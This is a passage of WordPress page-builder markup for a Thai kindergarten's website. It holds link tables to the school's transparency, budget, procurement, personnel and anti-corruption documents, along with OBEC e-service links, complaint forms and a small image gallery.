-->\n\n<!-- wp:generateblocks/container {\"uniqueId\":\"abc6c06d\",\"isGrid\":true,\"gridId\":\"2603ad26\",\"width\":50,\"widthMobile\":100,\"isDynamic\":true,\"blockVersion\":4} /-->\n\n<!-- wp:generateblocks/container {\"uniqueId\":\"b0641f20\",\"isGrid\":true,\"gridId\":\"2603ad26\",\"width\":50,\"widthMobile\":100,\"isDynamic\":true,\"blockVersion\":4} -->\n<!-- wp:image {\"id\":260,\"sizeSlug\":\"large\",\"linkDestination\":\"none\"} -->\n<figure class=\"wp-block-image size-large\"><img src=\"http://watprato.ssk.in.th/wp-content/uploads/2024/08/O27-1024x576.jpg\" alt=\"\" class=\"wp-image-260\"/></figure>\n<!-- /wp:image -->\n<!-- /wp:generateblocks/container -->\n<!-- /wp:generateblocks/grid -->\n<!-- /wp:generateblocks/container -->\n<!-- /wp:generateblocks/container -->\n\n<!-- wp:generateblocks/container {\"uniqueId\":\"4b6444ee\",\"isDynamic\":true,\"blockVersion\":4,\"spacing\":{\"paddingTop\":\"30px\",\"paddingLeft\":\"10px\",\"paddingRight\":\"10px\"}} -->\n<!-- wp:generateblocks/grid {\"uniqueId\":\"2467bce1\",\"columns\":2,\"horizontalGap\":30,\"verticalGap\":20,\"isDynamic\":true,\"blockVersion\":3} -->\n<!-- wp:generateblocks/container {\"uniqueId\":\"3094a446\",\"isGrid\":true,\"gridId\":\"2467bce1\",\"isDynamic\":true,\"blockVersion\":4,\"orderMobile\":2,\"sizing\":{\"width\":\"25%\",\"widthMobile\":\"100%\"},\"spacing\":{\"paddingBottom\":\"\"}} -->\n<!-- wp:group {\"layout\":{\"type\":\"constrained\"}} -->\n<div class=\"wp-block-group\"><!-- wp:generateblocks/button {\"uniqueId\":\"e4387b97\",\"blockVersion\":4,\"display\":\"flex\",\"flexDirection\":\"row\",\"alignItems\":\"center\",\"columnGap\":\"0.5em\",\"typography\":{\"fontSize\":\"17px\",\"fontFamily\":\"Kanit\"},\"fontFamilyFallback\":\"sans-serif\",\"googleFont\":true,\"googleFontVariants\":\"100, 100italic, 200, 200italic, 300, 300italic, regular, italic, 500, 500italic, 600, 600italic, 700, 700italic, 800, 800italic, 900, 900italic\",\"spacing\":{\"paddingTop\":\"8px\",\"paddingRight\":\"10px\",\"paddingBottom\":\"8px\",\"paddingLeft\":\"10px\",\"marginBottom\":\"3px\"},\"borders\":{\"borderTopLeftRadius\":\"3px\",\"borderTopRightRadius\":\"3px\",\"borderBottomRightRadius\":\"3px\",\"borderBottomLeftRadius\":\"3px\"},\"backgroundColor\":\"#cf2e2e\",\"backgroundColorHover\":\"#f78da7\",\"textColor\":\"#ffffff\",\"textColorHover\":\"#ffffff\",\"iconStyles\":{\"height\":\"1em\",\"width\":\"1em\"}} -->\n<span class=\"gb-button gb-button-e4387b97 gb-button-text\"><strong>ข้อมูลพื้นฐาน</strong></span>\n<!-- /wp:generateblocks/button -->\n\n<!-- wp:table {\"hasFixedLayout\":false,\"className\":\"is-style-stripes\",\"style\":{\"typography\":{\"fontSize\":\"15px\"}}} -->\n<figure class=\"wp-block-table is-style-stripes\" style=\"font-size:15px\"><table><tbody><tr><td><strong><a href=\"https://drive.google.com/file/d/14sI1pHQ6FFaNHMgoK3-29HJ5-OSuA8MD/view?usp=drive_link\" data-type=\"page\" data-id=\"19\">โครงสร้าง</a></strong></td></tr><tr><td><strong><a href=\"https://drive.google.com/file/d/1-XnhO6nbJXnq5lTaEGZNbfzXcc2abX8i/view?usp=sharing\" data-type=\"link\" data-id=\"https://drive.google.com/file/d/1-XnhO6nbJXnq5lTaEGZNbfzXcc2abX8i/view?usp=sharing\">ข้อมูลผู้บริหาร</a></strong></td></tr><tr><td><strong><a href=\"https://drive.google.com/file/d/1XJHSkYkyNrh6WeKkxZXZgQVm1OH-SOIU/view?usp=sharing\" data-type=\"link\" data-id=\"https://drive.google.com/file/d/1XJHSkYkyNrh6WeKkxZXZgQVm1OH-SOIU/view?usp=sharing\">อำนาจหน้าที่</a></strong></td></tr><tr><td><strong><a href=\"http://watprato.ssk.in.th/\" data-type=\"page\" data-id=\"19\">ข้อมูลการติดต่อ</a></strong></td></tr><tr><td><strong><a href=\"http://watprato.ssk.in.th/\" data-type=\"page\" data-id=\"19\">ข่าวประชาสัมพันธ์</a></strong></td></tr><tr><td><strong><code><a href=\"https://padlet.com/outansama/q-a-aq3i9qiljbyghzrp\" data-type=\"link\" data-id=\"https://padlet.com/outansama/q-a-aq3i9qiljbyghzrp\">Q&amp;A</a></code></strong></td></tr></tbody></table></figure>\n<!-- /wp:table -->\n\n<!-- wp:generateblocks/button {\"uniqueId\":\"306e037f\",\"blockVersion\":4,\"display\":\"flex\",\"flexDirection\":\"row\",\"alignItems\":\"center\",\"columnGap\":\"0.5em\",\"typography\":{\"fontSize\":\"17px\",\"fontFamily\":\"Kanit\"},\"fontFamilyFallback\":\"sans-serif\",\"googleFont\":true,\"googleFontVariants\":\"100, 100italic, 200, 200italic, 300, 300italic, regular, italic, 500, 500italic, 600, 600italic, 700, 700italic, 800, 800italic, 900, 900italic\",\"spacing\":{\"paddingTop\":\"8px\",\"paddingRight\":\"10px\",\"paddingBottom\":\"8px\",\"paddingLeft\":\"10px\",\"marginBottom\":\"3px\"},\"borders\":{\"borderTopLeftRadius\":\"3px\",\"borderTopRightRadius\":\"3px\",\"borderBottomRightRadius\":\"3px\",\"borderBottomLeftRadius\":\"3px\"},\"backgroundColor\":\"#cf2e2e\",\"backgroundColorHover\":\"#f78da7\",\"textColor\":\"#ffffff\",\"textColorHover\":\"#ffffff\",\"iconStyles\":{\"height\":\"1em\",\"width\":\"1em\"}} -->\n<span class=\"gb-button gb-button-306e037f gb-button-text\"><strong>การบริหารงานและงบประมาณ</strong></span>\n<!-- /wp:generateblocks/button -->\n\n<!-- wp:table {\"hasFixedLayout\":false,\"className\":\"is-style-stripes\",\"style\":{\"typography\":{\"fontSize\":\"15px\"}}} -->\n<figure class=\"wp-block-table is-style-stripes\" style=\"font-size:15px\"><table><tbody><tr><td><strong>แผนยุทธศาสตร์หรือแผนพัฒนาหน่วยงาน</strong></td></tr><tr><td><strong>แผนและความก้าวหน้าในการดำเนินงานและการใช้จ่ายงบประมาณประจำปี</strong></td></tr><tr><td><strong><a href=\"https://drive.google.com/file/d/1vuZFLIWRkwFNN4GX0n7enJwyg8eDIzBQ/view?usp=share_link\" data-type=\"link\" data-id=\"https://drive.google.com/file/d/1vuZFLIWRkwFNN4GX0n7enJwyg8eDIzBQ/view?usp=share_link\">รายงานผลการดำเนินงานประจำปี</a></strong></td></tr><tr><td><strong>คู่มือหรือแนวทางปฏิบัติงานของเจ้าหน้าที่</strong></td></tr><tr><td><strong><a href=\"https://drive.google.com/file/d/1ics-Zh-M3PJmB2iudN_y7YVcdRFtVcLi/view?usp=drive_link\" data-type=\"link\" data-id=\"https://drive.google.com/file/d/1ics-Zh-M3PJmB2iudN_y7YVcdRFtVcLi/view?usp=drive_link\">คู่มือแนวทางการให้บริการสำหรับผู้รับบริการหรือผู้มาติดต่อ</a></strong></td></tr><tr><td><strong><a href=\"https://drive.google.com/file/d/1UhXuS7Ye-9Gj0ft2Bc1psmWIuxTGlNlp/view?usp=drive_link\" data-type=\"link\" data-id=\"https://drive.google.com/file/d/1UhXuS7Ye-9Gj0ft2Bc1psmWIuxTGlNlp/view?usp=drive_link\">ข้อมูลเชิงสถิติการให้บริการ</a></strong></td></tr><tr><td><strong><a href=\"http://pp51pro.com:8077/?uri=anubanwatprato\" data-type=\"link\" data-id=\"http://pp51pro.com:8077/?uri=anubanwatprato\">E-Service</a></strong><br>      -  <a href=\"http://pp51pro.com:8077/?uri=anubanwatprato\" data-type=\"link\" data-id=\"http://pp51pro.com:8077/?uri=anubanwatprato\">สถิติการมาเรียน </a><br>      -  <a href=\"http://pp51pro.com:8077/?uri=anubanwatprato\" data-type=\"link\" data-id=\"http://pp51pro.com:8077/?uri=anubanwatprato\">ตรวจสอบผลการเรียน</a><br>      -  <a href=\"https://www.obec.go.th\" data-type=\"link\" data-id=\"https://www.obec.go.th\">OBEC</a><br>      -  <a href=\"http://contentcenter.obec.go.th\" data-type=\"link\" data-id=\"http://contentcenter.obec.go.th\">OBEC Content Center</a><br>      -  <a href=\"https://a6702.obec.expert/authen/login\" data-type=\"link\" data-id=\"https://a6702.obec.expert/authen/login\">School MIS</a><br>      -  <a href=\"https://portal.bopp-obec.info/obec67\" data-type=\"link\" data-id=\"https://portal.bopp-obec.info/obec67\">ข้อมูลนักเรียนรายบุคคล (DMC)</a></td></tr></tbody></table></figure>\n<!-- /wp:table -->\n\n<!-- wp:generateblocks/button {\"uniqueId\":\"8a5736ca\",\"blockVersion\":4,\"display\":\"flex\",\"flexDirection\":\"row\",\"alignItems\":\"center\",\"columnGap\":\"0.5em\",\"typography\":{\"fontSize\":\"17px\",\"fontFamily\":\"Kanit\"},\"fontFamilyFallback\":\"sans-serif\",\"googleFont\":true,\"googleFontVariants\":\"100, 100italic, 200, 200italic, 300, 300italic, regular, italic, 500, 500italic, 600, 600italic, 700, 700italic, 800, 800italic, 900, 900italic\",\"spacing\":{\"paddingTop\":\"8px\",\"paddingRight\":\"10px\",\"paddingBottom\":\"8px\",\"paddingLeft\":\"10px\",\"marginBottom\":\"3px\"},\"borders\":{\"borderTopLeftRadius\":\"3px\",\"borderTopRightRadius\":\"3px\",\"borderBottomRightRadius\":\"3px\",\"borderBottomLeftRadius\":\"3px\"},\"backgroundColor\":\"#cf2e2e\",\"backgroundColorHover\":\"#f78da7\",\"textColor\":\"#ffffff\",\"textColorHover\":\"#ffffff\",\"iconStyles\":{\"height\":\"1em\",\"width\":\"1em\"}} -->\n<span class=\"gb-button gb-button-8a5736ca gb-button-text\"><strong>การจัดซื้อจัดจ้าง</strong></span>\n<!-- /wp:generateblocks/button -->\n\n<!-- wp:table {\"hasFixedLayout\":false,\"className\":\"is-style-stripes\",\"style\":{\"typography\":{\"fontSize\":\"15px\"}}} -->\n<figure class=\"wp-block-table is-style-stripes\" style=\"font-size:15px\"><table><tbody><tr><td><strong>รายงานผลการจัดซื้อจัดจ้างหรือการจัดหาพัสดุ</strong></td></tr><tr><td><strong><a href=\"https://drive.google.com/file/d/1s25QprjH5mZ-zGGQHfrL8aL1LztcZZVs/view?usp=share_link\" data-type=\"link\" data-id=\"https://drive.google.com/file/d/1s25QprjH5mZ-zGGQHfrL8aL1LztcZZVs/view?usp=share_link\">ประกาศต่างๆ เกี่ยวกับการจัดซื้อจัดจ้างหรือจัดหาพัสดุ</a></strong></td></tr><tr><td><strong>ความก้าวหน้าการจัดซื้อจัดจ้างหรือการจัดหาพัสดุ</strong></td></tr><tr><td><strong>รายงานผลการจัดซื้อจัดจ้างหรือการจัดหาพัสดุประจำปี</strong></td></tr></tbody></table></figure>\n<!-- /wp:table -->\n\n<!-- wp:generateblocks/button {\"uniqueId\":\"8283a353\",\"blockVersion\":4,\"display\":\"flex\",\"flexDirection\":\"row\",\"alignItems\":\"center\",\"columnGap\":\"0.5em\",\"typography\":{\"fontSize\":\"17px\",\"fontFamily\":\"Kanit\"},\"fontFamilyFallback\":\"sans-serif\",\"googleFont\":true,\"googleFontVariants\":\"100, 100italic, 200, 200italic, 300, 300italic, regular, italic, 500, 500italic, 600, 600italic, 700, 700italic, 800, 800italic, 900, 900italic\",\"spacing\":{\"paddingTop\":\"8px\",\"paddingRight\":\"10px\",\"paddingBottom\":\"8px\",\"paddingLeft\":\"10px\",\"marginBottom\":\"3px\"},\"borders\":{\"borderTopLeftRadius\":\"3px\",\"borderTopRightRadius\":\"3px\",\"borderBottomRightRadius\":\"3px\",\"borderBottomLeftRadius\":\"3px\"},\"backgroundColor\":\"#cf2e2e\",\"backgroundColorHover\":\"#f78da7\",\"textColor\":\"#ffffff\",\"textColorHover\":\"#ffffff\",\"iconStyles\":{\"height\":\"1em\",\"width\":\"1em\"}} -->\n<span class=\"gb-button gb-button-8283a353 gb-button-text\"><strong>การบริหารและพัฒนาทรัพยากรบุคคล</strong></span>\n<!-- /wp:generateblocks/button -->\n\n<!-- wp:table {\"hasFixedLayout\":false,\"className\":\"is-style-stripes\",\"style\":{\"typography\":{\"fontSize\":\"15px\"}}} -->\n<figure class=\"wp-block-table is-style-stripes\" style=\"font-size:15px\"><table><tbody><tr><td><strong><a href=\"https://drive.google.com/file/d/18y88RapyKtpYZaogaASQKJRo0_aXRsbi/view?usp=share_link\" data-type=\"link\" data-id=\"https://drive.google.com/file/d/18y88RapyKtpYZaogaASQKJRo0_aXRsbi/view?usp=share_link\">แผนการบริหารและพัฒนาทรัพยากรบุคคล</a></strong></td></tr><tr><td><strong><a href=\"https://drive.google.com/file/d/16p7JP94yt1fzyAiaRNuuxqppMr-Z_s87/view?usp=share_link\" data-type=\"link\" data-id=\"https://drive.google.com/file/d/16p7JP94yt1fzyAiaRNuuxqppMr-Z_s87/view?usp=share_link\">รายงานการบริหารและพัฒนาทรัพยากรบุคคลประจำปี</a></strong></td></tr><tr><td><strong>ประมวลจริยธรรมสำหรับเจ้าหน้าที่ของรัฐ</strong></td></tr><tr><td><strong>การขับเคลื่อนจริยธรรม</strong></td></tr></tbody></table></figure>\n<!-- /wp:table -->\n\n<!-- wp:generateblocks/button {\"uniqueId\":\"8e160f87\",\"blockVersion\":4,\"display\":\"flex\",\"flexDirection\":\"row\",\"alignItems\":\"center\",\"columnGap\":\"0.5em\",\"typography\":{\"fontSize\":\"17px\",\"fontFamily\":\"Kanit\"},\"fontFamilyFallback\":\"sans-serif\",\"googleFont\":true,\"googleFontVariants\":\"100, 100italic, 200, 200italic, 300, 300italic, regular, italic, 500, 500italic, 600, 600italic, 700, 700italic, 800, 800italic, 900, 900italic\",\"spacing\":{\"paddingTop\":\"8px\",\"paddingRight\":\"10px\",\"paddingBottom\":\"8px\",\"paddingLeft\":\"10px\",\"marginBottom\":\"3px\"},\"borders\":{\"borderTopLeftRadius\":\"3px\",\"borderTopRightRadius\":\"3px\",\"borderBottomRightRadius\":\"3px\",\"borderBottomLeftRadius\":\"3px\"},\"backgroundColor\":\"#cf2e2e\",\"backgroundColorHover\":\"#f78da7\",\"textColor\":\"#ffffff\",\"textColorHover\":\"#ffffff\",\"iconStyles\":{\"height\":\"1em\",\"width\":\"1em\"}} -->\n<span class=\"gb-button gb-button-8e160f87 gb-button-text\"><strong>การส่งเสริมความโปร่งใส</strong></span>\n<!-- /wp:generateblocks/button -->\n\n<!-- wp:table {\"hasFixedLayout\":false,\"className\":\"is-style-stripes\",\"style\":{\"typography\":{\"fontSize\":\"15px\"}}} -->\n<figure class=\"wp-block-table is-style-stripes\" style=\"font-size:15px\"><table><tbody><tr><td><strong><a href=\"https://drive.google.com/file/d/1vpEfIBbTNX95TmNJuW7IdN5nLwUBzkuN/view?usp=drive_link\" data-type=\"link\" data-id=\"https://drive.google.com/file/d/1vpEfIBbTNX95TmNJuW7IdN5nLwUBzkuN/view?usp=drive_link\">แนวปฏิบัติการจัดการเรื่องร้องเรียนการทุจริตและประพฤติมิชอบ</a></strong></td></tr><tr><td><strong><a href=\"https://forms.gle/KBRUecqKvRqxgrPm7\" data-type=\"link\" data-id=\"https://forms.gle/KBRUecqKvRqxgrPm7\">ช่องทางแจ้งเรื่องร้องเรียนการทุจริตและประพฤติมิชอบ</a></strong></td></tr><tr><td><strong><a href=\"https://drive.google.com/file/d/1mvYvdhMLSABxaSKEGWClts0-nIUc7pwg/view?usp=sharing\" data-type=\"link\" data-id=\"https://drive.google.com/file/d/1mvYvdhMLSABxaSKEGWClts0-nIUc7pwg/view?usp=sharing\">ข้อมูลเชิงสถิติเรื่องร้องเรียนการทุจริตและปรพฤติมิชอบ</a></strong></td></tr><tr><td><strong><a href=\"https://drive.google.com/file/d/1sEnWAaXCQZ5zH9fciWyPRwRvdXA95k8x/view?usp=share_link\" data-type=\"link\" data-id=\"https://drive.google.com/file/d/1sEnWAaXCQZ5zH9fciWyPRwRvdXA95k8x/view?usp=share_link\">การเปิดโอกาสให้เกิดการมีส่วนร่วม</a></strong></td></tr></tbody></table></figure>\n<!-- /wp:table -->\n\n<!-- wp:generateblocks/button {\"uniqueId\":\"dd227e0e\",\"blockVersion\":4,\"display\":\"flex\",\"flexDirection\":\"row\",\"alignItems\":\"center\",\"columnGap\":\"0.5em\",\"typography\":{\"fontSize\":\"17px\",\"fontFamily\":\"Kanit\"},\"fontFamilyFallback\":\"sans-serif\",\"googleFont\":true,\"googleFontVariants\":\"100, 100italic, 200, 200italic, 300, 300italic, regular, italic, 500, 500italic, 600, 600italic, 700, 700italic, 800, 800italic, 900, 900italic\",\"spacing\":{\"paddingTop\":\"8px\",\"paddingRight\":\"10px\",\"paddingBottom\":\"8px\",\"paddingLeft\":\"10px\",\"marginBottom\":\"3px\"},\"borders\":{\"borderTopLeftRadius\":\"3px\",\"borderTopRightRadius\":\"3px\",\"borderBottomRightRadius\":\"3px\",\"borderBottomLeftRadius\":\"3px\"},\"backgroundColor\":\"#cf2e2e\",\"backgroundColorHover\":\"#f78da7\",\"textColor\":\"#ffffff\",\"textColorHover\":\"#ffffff\",\"iconStyles\":{\"height\":\"1em\",\"width\":\"1em\"}} -->\n<span class=\"gb-button gb-button-dd227e0e gb-button-text\"><strong>การดำเนินการเพื่อป้องกันการทุจริตในประเด็นสินบน</strong></span>\n<!-- /wp:generateblocks/button -->\n\n<!-- wp:table {\"hasFixedLayout\":false,\"className\":\"is-style-stripes\",\"style\":{\"typography\":{\"fontSize\":\"15px\"}}} -->\n<figure class=\"wp-block-table is-style-stripes\" style=\"font-size:15px\"><table><tbody><tr><td><strong><a href=\"https://drive.google.com/file/d/10Sl2uV0MH7K-Cnm_cbftOiRWMmdulXqc/view?usp=share_link\" data-type=\"link\" data-id=\"https://drive.google.com/file/d/10Sl2uV0MH7K-Cnm_cbftOiRWMmdulXqc/view?usp=share_link\">ประกาศเจตนารมณ์นโยบาย No Gift Policy จากการปฏิบัติหน้าที่</a></strong></td></tr><tr><td><strong><a href=\"https://docs.google.com/forms/d/e/1FAIpQLSeE1kKWcuOnYJpmEpbv5v8OHwhaZOO-bGbJU1Pe52CMO-1qTg/viewform?usp=share_link\" data-type=\"link\" data-id=\"https://docs.google.com/forms/d/e/1FAIpQLSeE1kKWcuOnYJpmEpbv5v8OHwhaZOO-bGbJU1Pe52CMO-1qTg/viewform?usp=share_link\">การสร้างวัฒนธรรม&nbsp; No Gift Policy</a></strong></td></tr><tr><td><strong><a href=\"https://drive.google.com/file/d/1icrf52k0yexL-UwEM4ahuLs3tm6Ql8_Q/view?usp=share_link\" data-type=\"link\" data-id=\"https://drive.google.com/file/d/1icrf52k0yexL-UwEM4ahuLs3tm6Ql8_Q/view?usp=share_link\">รายงานผลตามนโยบาย No Gift Policy</a></strong></td></tr><tr><td><strong><a href=\"https://drive.google.com/file/d/10vrLC6y6r5_UvjaVQt_BXXu3yUH_ls9i/view?usp=share_link\" data-type=\"link\" data-id=\"https://drive.google.com/file/d/10vrLC6y6r5_UvjaVQt_BXXu3yUH_ls9i/view?usp=share_link\">รายงานการรับทรัพย์สินบนหรือประโยชน์อื่นใดโดยธรรมจรรยา</a></strong></td></tr><tr><td><strong><a href=\"https://drive.google.com/file/d/1W1gQsQUPnpERA_nlDfD3InVipLL6lnBt/view?usp=drive_link\" data-type=\"link\" data-id=\"https://drive.google.com/file/d/1W1gQsQUPnpERA_nlDfD3InVipLL6lnBt/view?usp=drive_link\">การประเมินความเสี่ยงการทุจริตในประเด็นที่เกี่ยวข้องกับสินบน</a></strong></td></tr><tr><td><strong><a href=\"https://drive.google.com/file/d/1NK3-A2RUV5X8wgneATtANg0LWcCiaydb/view?usp=share_link\" data-type=\"link\" data-id=\"https://drive.google.com/file/d/1NK3-A2RUV5X8wgneATtANg0LWcCiaydb/view?usp=share_link\">รายงานผลการดำเนินการเพื่อจัดการความเสี่ยงและประพฤติมิชอบประจำปี</a></strong></td></tr></tbody></table></figure>\n<!-- /wp:table -->\n\n<!-- wp:generateblocks/button {\"uniqueId\":\"85986834\",\"blockVersion\":4,\"display\":\"flex\",\"flexDirection\":\"row\",\"alignItems\":\"center\",\"columnGap\":\"0.5em\",\"typography\":{\"fontSize\":\"17px\",\"fontFamily\":\"Kanit\"},\"fontFamilyFallback\":\"sans-serif\",\"googleFont\":true,\"googleFontVariants\":\"100, 100italic, 200, 200italic, 300, 300italic, regular, italic, 500, 500italic, 600, 600italic, 700, 700italic, 800, 800italic, 900, 900italic\",\"spacing\":{\"paddingTop\":\"8px\",\"paddingRight\":\"10px\",\"paddingBottom\":\"8px\",\"paddingLeft\":\"10px\",\"marginBottom\":\"3px\"},\"borders\":{\"borderTopLeftRadius\":\"3px\",\"borderTopRightRadius\":\"3px\",\"borderBottomRightRadius\":\"3px\",\"borderBottomLeftRadius\":\"3px\"},\"backgroundColor\":\"#cf2e2e\",\"backgroundColorHover\":\"#f78da7\",\"textColor\":\"#ffffff\",\"textColorHover\":\"#ffffff\",\"iconStyles\":{\"height\":\"1em\",\"width\":\"1em\"}} -->\n<span class=\"gb-button gb-button-85986834 gb-button-text\"><strong>มาตรการส่งเสริมคุณธรรมและความโปร่งใส</strong></span>\n<!-- /wp:generateblocks/button -->\n\n<!-- wp:table {\"hasFixedLayout\":false,\"className\":\"is-style-stripes\",\"style\":{\"typography\":{\"fontSize\":\"15px\"}}} -->\n<figure class=\"wp-block-table is-style-stripes\" style=\"font-size:15px\"><table><tbody><tr><td><strong><a href=\"https://drive.google.com/file/d/10vrLC6y6r5_UvjaVQt_BXXu3yUH_ls9i/view?usp=share_link\" data-type=\"link\" data-id=\"https://drive.google.com/file/d/10vrLC6y6r5_UvjaVQt_BXXu3yUH_ls9i/view?usp=share_link\">แผนการปฏิบัติการป้องกันการทุจริต</a></strong></td></tr><tr><td><strong><a href=\"https://drive.google.com/file/d/1sPS_Yg50vqXIEkS1xwD-f4nBGOjW_xW7/view?usp=share_link\" data-type=\"link\" data-id=\"https://drive.google.com/file/d/1sPS_Yg50vqXIEkS1xwD-f4nBGOjW_xW7/view?usp=share_link\">รายงานการดำเนินการป้องกันการทุจริตประจำปี</a></strong></td></tr><tr><td><strong><a href=\"https://drive.google.com/file/d/1l76kF-c6CryzCngVGqebClQpOMRnofY1/view?usp=share_link\" data-type=\"link\" data-id=\"https://drive.google.com/file/d/1l76kF-c6CryzCngVGqebClQpOMRnofY1/view?usp=share_link\">มาตรการส่งเสริมคุณธรรมและความโปร่งใสภายในหน่วยงาน</a></strong></td></tr><tr><td><strong><a href=\"https://drive.google.com/file/d/1LOn6Jw1hFEEY_ikE_hexCNtU50UrYTtq/view?usp=share_link\" data-type=\"link\" data-id=\"https://drive.google.com/file/d/1LOn6Jw1hFEEY_ikE_hexCNtU50UrYTtq/view?usp=share_link\">รายงานผลการดำเนินการเพื่อส่งเสริมคุณธรรมและความโปร่งใสภายในหน่วยงาน</a></strong></td></tr></tbody></table></figure>\n<!-- /wp:table --></div>\n<!-- /wp:group -->\n\n<!-- wp:generateblocks/container {\"uniqueId\":\"76fbe2ef\",\"isDynamic\":true,\"blockVersion\":4} -->\n<!-- wp:kadence/advancedgallery {\"uniqueID\":\"19_91838d-0f\",\"columns\":[1,1,1,1,1,1],\"ids\":[81,82,83,84],\"linkTo\":\"custom\",\"showCaption\":true,\"captionStyle\":\"cover-hover\",\"gutter\":[10,\"\",10],\"displayShadow\":true,\"imagesDynamic\":[{\"id\":81,\"link\":\"https://nsschool.ac.th/home/%e0%b8%9b%e0%b8%a3%e0%b8%b0%e0%b9%80%e0%b8%a1%e0%b8%b4%e0%b8%99/\",\"alt\":\"\",\"url\":\"https://nsschool.ac.th/wp-content/uploads/2024/06/ประเมิน.jpg\",\"customLink\":\"https://docs.google.com/forms/d/e/1FAIpQLSeE1kKWcuOnYJpmEpbv5v8OHwhaZOO-bGbJU1Pe52CMO-1qTg/viewform?usp=share_link\",\"linkTarget\":\"\",\"linkSponsored\":\"\",\"thumbUrl\":\"https://nsschool.ac.th/wp-content/uploads/2024/06/ประเมิน-1024x353.jpg\",\"lightUrl\":\"https://nsschool.ac.th/wp-content/uploads/2024/06/ประเมิน.jpg\",\"width\":750,\"height\":259},{\"id\":82,\"link\":\"https://nsschool.ac.th/home/%e0%b8%8a%e0%b9%88%e0%b8%ad%e0%b8%87%e0%b8%97%e0%b8%b2%e0%b8%87%e0%b9%81%e0%b8%88%e0%b9%89%e0%b8%87%e0%b9%80%e0%b8%a3%e0%b8%b7%e0%b9%88%e0%b8%ad%e0%b8%87%e0%b8%a3%e0%b9%89%e0%b8%ad%e0%b8%87%e0%b9%80/\",\"alt\":\"\",\"url\":\"https://nsschool.ac.th/wp-content/uploads/2024/06/ช่องทางแจ้งเรื่องร้องเรียนทั่วไป.png\",\"customLink\":\"https://forms.gle/ogsMCed1YfypogeK8\",\"linkTarget\":\"\",\"linkSponsored\":\"\",\"thumbUrl\":\"https://nsschool.ac.th/wp-content/uploads/2024/06/ช่องทางแจ้งเรื่องร้องเรียนทั่วไป-1024x353.png\",\"lightUrl\":\"https://nsschool.ac.th/wp-content/uploads/2024/06/ช่องทางแจ้งเรื่องร้องเรียนทั่วไป.png\",\"width\":750,\"height\":259},{\"id\":83,\"link\":\"https://nsschool.ac.th/home/%e0%b8%a3%e0%b9%89%e0%b8%ad%e0%b8%87%e0%b9%80%e0%b8%a3%e0%b8%b5%e0%b8%a2%e0%b8%99%e0%b8%97%e0%b8%b8%e0%b8%88%e0%b8%a3%e0%b8%b4%e0%b8%95%e0%b8%9b%e0%b8%a3%e0%b8%b0%e0%b8%9e%e0%b8%a4%e0%b8%95%e0%b8%b4/\",\"alt\":\"\",\"url\":\"https://nsschool.ac.th/wp-content/uploads/2024/06/ร้องเรียนทุจริตประพฤติมิชอบ.png\",\"customLink\":\"https://forms.gle/ZyUhBS2TYmZiZVPR6\",\"linkTarget\":\"\",\"linkSponsored\":\"\",\"thumbUrl\":\"https://nsschool.ac.th/wp-content/uploads/2024/06/ร้องเรียนทุจริตประพฤติมิชอบ-1024x353.png\",\"lightUrl\":\"https://nsschool.ac.th/wp-content/uploads/2024/06/ร้องเรียนทุจริตประพฤติมิชอบ.png\",\"width\":750,\"height\":259},{\"id\":84,\"link\":\"https://nsschool.ac.th/home/%e0%b8%84%e0%b8%a7%e0%b8%b2%e0%b8%a1%e0%b8%84%e0%b8%b4%e0%b8%94%e0%b9%80%e0%b8%ab%e0%b9%87%e0%b8%99/\",\"alt\":\"\",\"url\":\"https://nsschool.ac.th/wp-content/uploads/2024/06/ความคิดเห็น.jpg\",\"customLink\":\"https://forms.gle/6upfY9jUcbu2kPti8\",\"linkTarget\":\"\",\"linkSponsored\":\"\",\"thumbUrl\":\"https://nsschool.ac.th/wp-content/uploads/2024/06/ความคิดเห็น-1024x353.jpg\",\"lightUrl\":\"https://nsschool.ac.th/wp-content/uploads/2024/06/ความคิดเห็น.jpg\",\"width\":750,\"height\":259}],\"kbVersion\":2} /-->\n<!-- /wp:generateblocks/container -->\n<!-- /wp:generateblocks/container -->\n\n<!-- wp:generateblocks/container {\"uniqueId\":\"07462550\",\"isGrid\":true,\"gridId\":\"2467bce1\",\"isDynamic\":true,\"blockVersion\":4,\"orderMobile\":1,\"sizing\":{\"width\":\"75%\",\"widthMobile\":\"100%\"}} -->\n<!-- wp:contentviews/grid1 {\"blockId\":\"7dr8k85x\",\"whichLayout\":\"layout2\",\"columns\":{\"md\":2,\"sm\":2,\"xs\":1},\"taxonomy\":[{\"label\":\"หมวดหมู่\",\"value\":\"category\"}],\"fieldsPosition\":[\"showThumbnail\",\"showTitle\",\"showContent\",\"showReadmore\",\"showMeta\",\"showCustomField\",\"showWooPrice\",\"showWooATC\",\"showWooRating\",\"showWooHook\"],\"showContent\":false,\"showReadmore\":false,\"showMeta\":true,\"metaSeparator\":\"|\",\"showPagination\":true,\"imgSize\":\"large\",\"thumbnailHeight\":{\"md\":250,\"xs\":100},\"thumbnailHeightUnits\":{\"xs\":\"%\"},\"thumbnailEffect\":\"cveffect-darken\",\"postsPerPage\":\"4\",\"headingText\":\"ข่าวกิจกรรมโรงเรียน\",\"headingStyle\":\"heading4\",\"category-terms\":[{\"label\":\"ข่าวกิจกรรมโรงเรียน\",\"value\":\"news\"}],\"meta-fieldsfSize\":{\"md\":11},\"headingBgColor\":\"#00000000\",\"headingWeight\":\"600\",\"headingfSize\":{\"md\":24},\"titleWeight\":\"500\",\"titlefSize\":{\"md\":18},\"titleLine\":{\"md\":30},\"taxotermfSize\":{\"md\":11},\"paginationMargin\":{\"md\":{\"top\":\"\",\"right\":\"\",\"bottom\":\"-40\",\"left\":\"\"}}} /-->\n\n<!-- wp:spacer {\"height\":\"30px\"} -->\n<div style=\"height:30px\" aria-hidden=\"true\" class=\"wp-block-spacer\"></div>\n<!-- /wp:spacer -->\n\n<!-- wp:contentviews/list1 